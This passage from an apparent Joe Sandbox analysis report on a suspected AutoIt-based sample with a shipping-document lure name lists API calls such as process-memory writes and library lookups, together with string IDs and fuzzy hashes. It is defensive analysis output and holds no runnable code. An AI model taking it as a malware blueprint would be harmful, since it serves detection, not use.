                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                    • CoInitialize.OLE32(00000000), ref: 00E6BA47
                    • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6BA60
                    • CoUninitialize.OLE32 ref: 00E6BA7D
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                    • String ID: .lnk
                    • API String ID: 2126378814-24824748
                    • Opcode ID: 98875f112f1399b0a39d1f7dd4a3728bfd635a378582aedb83326b3a9f21027d
                    • Instruction ID: 5248a23f5dd5667f57cea0288df3fe13e1544ddaa3c92d26919d7341c712dc8b
                    • Opcode Fuzzy Hash: 98875f112f1399b0a39d1f7dd4a3728bfd635a378582aedb83326b3a9f21027d
                    • Instruction Fuzzy Hash: DDA155756043019FCB14DF54C884D6ABBE5FF88314F149998F89AAB3A2CB31ED85CB91
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00E5B780
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%
                    • API String ID: 3565006973-1286912533
                    • Opcode ID: 1ea00f525998e4d2b08bf427e5e9665771e6949c23be4efc9e3760efbe7d72a3
                    • Instruction ID: 0ebb5d7917b1cd212795b4652868619580c940d4144ecd5e75972250f0da683a
                    • Opcode Fuzzy Hash: 1ea00f525998e4d2b08bf427e5e9665771e6949c23be4efc9e3760efbe7d72a3
                    • Instruction Fuzzy Hash: CD916B70600201AFDB14DF64C885B66BBF9FF48715F10996EF949EB691DBB0E844CB50
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00E2521D
                      • Part of subcall function 00E30270: __87except.LIBCMT ref: 00E302AB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 314baefdb16c127fcc00ccbec363571648ab4600c1b3574986af097e1d4e4cfe
                    • Instruction ID: 7abb9465ce83a2d0bb122b485b531eea3d5492dac4da250da22865a771f4b2f2
                    • Opcode Fuzzy Hash: 314baefdb16c127fcc00ccbec363571648ab4600c1b3574986af097e1d4e4cfe
                    • Instruction Fuzzy Hash: AF518A23A0DA01DBDB11B714EA593BE6FE49B00714F20AD59E0D1B22F9EF308DC8D646
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: 784ee1d9c8fb9a0d50d40bfc9dfb4c6b55a93c957b2840a8763a07b80819650e
                    • Instruction ID: 1ed7b676b021283e34c2f894808836c9bf1408602eeaf5ca5a1ea8ba7f78487e
                    • Opcode Fuzzy Hash: 784ee1d9c8fb9a0d50d40bfc9dfb4c6b55a93c957b2840a8763a07b80819650e
                    • Instruction Fuzzy Hash: B4515636504216DFCF15DF28C4986FA7BA4EF55310F142456EC81BB2E2D730AC4ACB60
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oa
                    • API String ID: 2620147621-3945284152
                    • Opcode ID: 84e6acfc519cf39a4666f707b7d45838735595713fbf38a0b059962178f108f2
                    • Instruction ID: 61de5676d18659bf280429347abd26f4f96126d83a96f4345cc0bd20a934b28c
                    • Opcode Fuzzy Hash: 84e6acfc519cf39a4666f707b7d45838735595713fbf38a0b059962178f108f2
                    • Instruction Fuzzy Hash: F5518AB16083419FDB24CF28D881B6EBBE1FF89314F04592DE999A7351D731E981CB82
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 6378491e3664c39c8d824153a0fba15c2879c9cd9f39facd25515bbb6e23c099
                    • Instruction ID: 467c68c17b73ede9d985a482d988d6072cc544b65f1a593f8f91f83e09815c1f
                    • Opcode Fuzzy Hash: 6378491e3664c39c8d824153a0fba15c2879c9cd9f39facd25515bbb6e23c099
                    • Instruction Fuzzy Hash: B851C371900319DBDB24CF55C9817EAB7F4FF44318F20956EE95AEB281E770AA84CB40
                    APIs
                      • Part of subcall function 00E617ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59558,?,?,00000034,00000800,?,00000034), ref: 00E61817
                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E59B01
                      • Part of subcall function 00E617B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59587,?,?,00000800,?,00001073,00000000,?,?), ref: 00E617E2
                      • Part of subcall function 00E6170F: GetWindowThreadProcessId.USER32(?,?), ref: 00E6173A
                      • Part of subcall function 00E6170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E5951C,00000034,?,?,00001004,00000000,00000000), ref: 00E6174A
                      • Part of subcall function 00E6170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E5951C,00000034,?,?,00001004,00000000,00000000), ref: 00E61760
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E59B6E
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E59BBB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                    • String ID: @
                    • API String ID: 4150878124-2766056989
                    • Opcode ID: 5a0def9d2681fcec8ca758f374dba77e2a47569bb940f234cb2261a3453227f9
                    • Instruction ID: 35142e0fb061f4cde476e65194e62e137294fd195fa19b75f7548d854f4ba365
                    • Opcode Fuzzy Hash: 5a0def9d2681fcec8ca758f374dba77e2a47569bb940f234cb2261a3453227f9
                    • Instruction Fuzzy Hash: AD418D76900218BFDB11DFA4DC81EDEBBB8EF09300F104099FA55B7191DA706E88CBA0
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E8F910,00000000,?,?,?,?), ref: 00E87A11
                    • GetWindowLongW.USER32 ref: 00E87A2E
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E87A3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 3a27b3be1ed2ccddce80e2504ed8a06ce3d09039c39cc6db5fd36b2fe8279211
                    • Instruction ID: 201cb01fb0cab64feec120e7ec456e904c73682982f9ac41ada9714b2b5615d0
                    • Opcode Fuzzy Hash: 3a27b3be1ed2ccddce80e2504ed8a06ce3d09039c39cc6db5fd36b2fe8279211
                    • Instruction Fuzzy Hash: E631D031204606AFDB15AF34CC45BEA77A9EB44328F206725F8BDB21E0D730ED918B50
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E87493
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E874A7
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E874CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 72939447a9e55fccf34356c019ce4778cdffb353a7f8d19d138d45ddaf7d15a9
                    • Instruction ID: e0502e7034c9ba3e1d44b6a07ae87a39c5f3d2a21f97bbd4d80323c1bf97f803
                    • Opcode Fuzzy Hash: 72939447a9e55fccf34356c019ce4778cdffb353a7f8d19d138d45ddaf7d15a9
                    • Instruction Fuzzy Hash: 6E21D332500219AFDF219F90DC42FEA3BA9EF48724F211214FE587B1D0D671E895DB90
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E86D6D
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E86D7D
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E86DA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: e6c2656276eaaf4cf67dea0cd53984ad00ab1c718f8709b4c2ea90dfa121dcfe
                    • Instruction ID: 45d2febd47d039b9c2385661f5655cee245a15da22c82171bc3e07e0050e0de2
                    • Opcode Fuzzy Hash: e6c2656276eaaf4cf67dea0cd53984ad00ab1c718f8709b4c2ea90dfa121dcfe
                    • Instruction Fuzzy Hash: 7B219532610118BFDF11AF54DC45FAB37AAEF89754F119124FA0CBB1D0C671AC5197A0
                    APIs
                    • __snwprintf.LIBCMT ref: 00E73B7C
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __snwprintf_memmove
                    • String ID: , $$AUTOITCALLVARIABLE%d$%
                    • API String ID: 3506404897-3879706725
                    • Opcode ID: 43b4a42395fa2e8a2ab742b69e1663055abd08757b6c3a07ea8f51207e21c208
                    • Instruction ID: bb712a78d4e654144b2627205af80c734b57f84972b1a75a2edcda0d4d2b4385
                    • Opcode Fuzzy Hash: 43b4a42395fa2e8a2ab742b69e1663055abd08757b6c3a07ea8f51207e21c208
                    • Instruction Fuzzy Hash: 4F215475601219AACF54EF64CC82E9E77A4FF44700F406498F449B7281DB30AE85DBA1
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E877A4
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E877B9
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E877C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: a5628f23483bb95c8d96dcc3e36f67409858d8f131701ccf79814cb6d67adb9d
                    • Instruction ID: b1f96abd13c18b5560b2cb0ae781c93ed6c8879105c71cd171ad0caae584d745
                    • Opcode Fuzzy Hash: a5628f23483bb95c8d96dcc3e36f67409858d8f131701ccf79814cb6d67adb9d
                    • Instruction Fuzzy Hash: CD11E732254208BEEF106F61CC45FE77BA9EF89719F111119F749B60D0D672E851DB20
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: $@B
                    • API String ID: 3494438863-460053111
                    • Opcode ID: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                    • Instruction ID: 554b3c266c2bd5da96d3c7e7e1bbee137f5bb4c0fa0fdc07102ede7ecfc0da5d
                    • Opcode Fuzzy Hash: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                    • Instruction Fuzzy Hash: 2CF0C872305626CEF728AF26BD11BB167E4E741324B101937E504FE1E0E77598C24680
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04C2E), ref: 00E04CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E04CB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                    • Instruction ID: 9f187594e21f36147ce9c0dc429cd281e0fdd93e9c3bf85270bdeb93eb4953cb
                    • Opcode Fuzzy Hash: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                    • Instruction Fuzzy Hash: 88D012B0511723CFE7205F31DA58646B6D5AF05755F219839D88DF6190D670D4C0C750
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04CE1,?), ref: 00E04DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E04DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                    • Instruction ID: 357d11a3a319922a2a7519453374a0fe44e8389c6b4cdebf16828de950de0b52
                    • Opcode Fuzzy Hash: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                    • Instruction Fuzzy Hash: FDD017B1651713CFD7209F32D908A9676E5AF05759B11983AD8CAF61A0E770D8C0CBA0
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04D2E,?,00E04F4F,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E04D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                    • Instruction ID: 20b297652015321db4b5b2898fa56982636de72624ec28d6a8f0dde9e6de4e59
                    • Opcode Fuzzy Hash: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                    • Instruction Fuzzy Hash: 73D017B1611713CFD7209F72D90865676E8AF15756B11983ED48AF62A0E670D8C0CB60
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00E810C1), ref: 00E80E80
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E80E92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                    • Instruction ID: bf01d40b0a2fd2fd5850b2f0ea18a17b116efbcc16fa1823573a19f3fcf312af
                    • Opcode Fuzzy Hash: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                    • Instruction Fuzzy Hash: 8CD01770591723CFDB30AF36C9086C776E4AF04756B11AC3AE58EF6151E670C884CB60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E78E09,?,00E8F910), ref: 00E79203
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E79215
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                    • Instruction ID: b1badfecb929000ea02d92c7d79692d3bbe4e159455bd3f97c40627b73fac077
                    • Opcode Fuzzy Hash: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                    • Instruction Fuzzy Hash: F5D0C230690313EFC7206F31DD0820272D5AF00351B00D839D88DF2162D670C480C710
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
